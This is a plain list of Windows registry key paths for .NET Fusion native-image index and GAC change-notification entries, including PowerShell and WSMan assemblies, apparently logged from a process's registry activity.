HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Transactions,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\ApplicationBase
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Core,3.5.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.ServiceProcess,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6eae2d34\3b249b34\79\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\85e83df\2c4cd1a4\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\56d30baa\7df4ed04\3c\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\24bf93f6\3d7304a5\76\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7df4ed04\78e5e798\3c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
